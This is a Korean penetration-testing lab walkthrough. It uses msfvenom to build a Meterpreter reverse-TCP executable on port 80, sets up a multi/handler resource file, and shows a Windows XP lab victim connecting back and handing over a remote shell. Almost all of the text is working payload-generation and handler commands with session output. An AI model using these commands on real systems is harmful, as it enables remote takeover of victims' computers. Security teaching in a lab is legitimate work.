malware.exe 포트 변경하기

실습> malware.exe 포트 변경하기

4444 -> 80 번 포트로 변경하고 테스트를 진행한다.

1. 악성코드 생성
포트를 80으로 설정하고 malware.exe를 생성한다.
Attacker# msfvenom -p windows/meterpreter/reverse_tcp \
lhost=192.168.108.200 lport=80 -f exe -o /var/www/html/malware.exe

2. malware.rc 파일 생성
Attacker# vi malware.rc 
info multi/handler
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set lhost 192.168.108.200
set lport 80
exploit 

3. 악성코드 다운로드
WinXP에서 malware.exe를 다운로드 받아서 바탕화면에 저장한다.
http://192.168.108.200/malware.exe

4. 웹서버 중지
msfconsole 에서 80번 포트로 오픈하므로 웹서버를 중지한다.
Attacker# /etc/init.d/apache2 stop

5. malware.rc 실행
victim이 들어올 수 있도록 80번 포트로 대기한다.
Attacker#  msfconsole -r malware.rc 
  :
  :(생략)
resource (malware.rc)> set lhost 192.168.108.200
lhost => 192.168.108.200
resource (malware.rc)> set lport 80
lport => 80
resource (malware.rc)> exploit
[*] Started reverse TCP handler on 192.168.108.200:80 

6. 악성코드 실행
WinXP가 malware.exe를 실행하면 공격자에게 리버스 커넥션으로 연결되서 공격자에게 조종 당하는 좀비PC가 된다. 

80번 포트로 공격자에게 연결되는 것을 확인할 수 있다.
[*] Sending stage (175174 bytes) to 192.168.108.150
[*] Meterpreter session 1 opened (192.168.108.200:80 -> 192.168.108.150:1424 ) at 2022-02-24 07:09:24 -0500

meterpreter > sysinfo
Computer        : VICTIM_WINXP
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : ko_KR
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > shell
Process 1728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\ksw\바탕 화면>exit